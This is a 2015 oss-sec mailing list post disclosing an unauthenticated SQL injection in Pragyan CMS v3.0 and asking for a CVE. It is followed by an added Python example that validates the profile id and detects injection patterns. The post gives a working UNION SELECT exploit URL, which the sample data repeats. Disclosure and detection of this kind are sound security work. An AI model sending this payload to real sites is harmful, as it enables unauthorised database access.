oss-sec mailing list archives
CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Tue, 3 Feb 2015 21:46:01 +0100
Hi Steve, Josh, vendors, list.
I found an SQL injection vulnerability in Pragyan CMS v. 3.0.
Attackers can exploit that vulnerability by appending arbitrary SQL queries
to a registered user's profile id without being authenticated.
Exploit-Example:
http://{TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+
Can you please assign a CVE-ID for that?
Thank you!
Greetings.
Steffen Rösemann
References:
[1] http://delta.nitt.edu/ / https://github.com/delta/pragyan
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html
[3] https://github.com/delta/pragyan/issues/206
[4] https://github.com/sroesemann/pragyan
[5] http://pastebin.com/ip2gGYuS
[6] http://sroesemann.blogspot.de/2015/02/advisory-for-sroeadv-2015-11.html
[7] http://seclists.org/fulldisclosure/2015/Feb/18
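As an added example, not part of the original post or of the Pragyan project, a defender-side check for the profile-id route described above: the id segment is allow-listed as a bare integer before it reaches a parameterised query, and rejected segments carrying injection indicators are flagged for log review. The route shape, the in-memory user table and the sample paths are constructed assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample paths (not from the original post): a benign profile
# lookup and one carrying the union-select payload quoted in the advisory.
SAMPLE_PATHS = [
    "/user:1",
    "/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+",
]

_USER_ROUTE = re.compile(r"^/user:([^/?#]*)$")
_SQLI_HINTS = re.compile(r"'|--|\b(union|select)\b", re.IGNORECASE)

def parse_profile_id(path):
    """Return the profile id as int when the segment is a bare decimal integer, else None.
    The id is allow-listed before use, so a '1'-prefixed payload never becomes an id."""
    m = _USER_ROUTE.match(path)
    if m is None:
        return None
    segment = unquote_plus(m.group(1))
    return int(segment) if re.fullmatch(r"[0-9]{1,10}", segment) else None

def classify_request(path):
    """'ok' for a clean id; 'sqli' when the rejected segment carries injection
    indicators (quote, comment marker, UNION/SELECT); otherwise 'reject'."""
    if parse_profile_id(path) is not None:
        return "ok"
    m = _USER_ROUTE.match(path)
    decoded = unquote_plus(m.group(1)) if m else ""
    return "sqli" if _SQLI_HINTS.search(decoded) else "reject"

def lookup_user(conn, path):
    """Fetch the username for a /user:<id> path with a parameterised query.
    Returns None for a malformed id or an unknown user."""
    uid = parse_profile_id(path)
    if uid is None:
        return None
    row = conn.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None

def demo_db():
    """In-memory table standing in for the CMS user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn

if __name__ == "__main__":
    conn = demo_db()
    for p in SAMPLE_PATHS:
        print(p, "->", classify_request(p), lookup_user(conn, p))
```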
